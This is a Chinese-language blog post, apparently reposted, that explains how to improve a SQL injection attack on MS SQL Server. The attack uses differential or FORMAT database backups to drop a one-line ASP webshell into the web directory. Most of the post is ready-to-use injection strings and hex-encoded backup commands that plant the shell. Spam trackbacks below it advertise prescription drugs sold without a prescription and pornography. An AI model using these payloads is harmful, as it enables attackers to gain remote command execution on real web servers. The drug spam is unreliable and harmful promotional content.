db备份shell的改进2点
Posted by adminJun 13
减少备份文件大小,得到可执行的webshell成功率提高不少
一利用差异备份
加一个参数WITH DIFFERENTIAL
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
二利用完全FORMAT
加一个参数WITH FROMAT
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
总的来说就是那么简单几句,下面以备份数据库model为例子
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
id=1;backup database model to disk='你的路径‘ with differential,format;--
转自:http://www.webxiaoz.cn/article/experience/655.htm










































4 comments
Trackback by Snort a vicodin. on April 16, 2010 at 10:29 am
Vicodin and hydroxyzine....
Vicodin. Vicodin no prescription. Easing symptoms of vicodin withdrawal....
Trackback by Real milf sex. on April 16, 2010 at 10:43 pm
Extreme milf legs sex....
Milf sex. Xxx milf sex. Milf sex video. Milf sex photos. Free milf sex videos....
Trackback by Tramadol use in canines. on April 17, 2010 at 3:19 am
Cheapest tramadol....
Tramadol 180. Buy tramadol online cod. Taking tramadol while pregnant. Tramadol. Hydrochloride tramadol....
Trackback by Granny hardcore sex. on April 17, 2010 at 2:11 pm
Ugly sluts granny sex....
Granny sex....
You must be logged in to post a comment.